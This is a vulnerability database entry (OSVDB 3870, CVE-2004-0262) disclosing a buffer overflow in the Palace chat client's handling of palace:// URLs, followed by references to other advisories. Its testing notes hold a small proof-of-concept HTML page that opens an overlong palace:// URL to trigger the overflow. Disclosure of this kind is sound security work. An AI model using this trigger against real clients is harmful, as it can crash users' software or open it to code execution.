Palace Client Connection URL Overflow

2004-02-07T01:50:46
ID OSVDB:3870
Type osvdb
Reporter OSVDB
Modified 2004-02-07T01:50:46

Description

Vulnerability Description

A local overflow exists in Palace. The client fails to validate custom URLs resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

A local overflow exists in Palace. The client fails to validate custom URLs resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

------------------------------[badpage.html]------------------------------ <html><body><script> window.open("palace://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBBXXXX ")</script></body></html> --------------------------------------------------------------------------

References:

Vendor URL: http://www.thepalace.com/ Secunia Advisory ID:10767 Other Advisory URL: http://archives.neohapsis.com/archives/vulnwatch/2004-q1/0033.html Other Advisory URL: http://www.elitehaven.net/thepalace.txt ISS X-Force ID: 15074 CVE-2004-0262 Bugtraq ID: 9602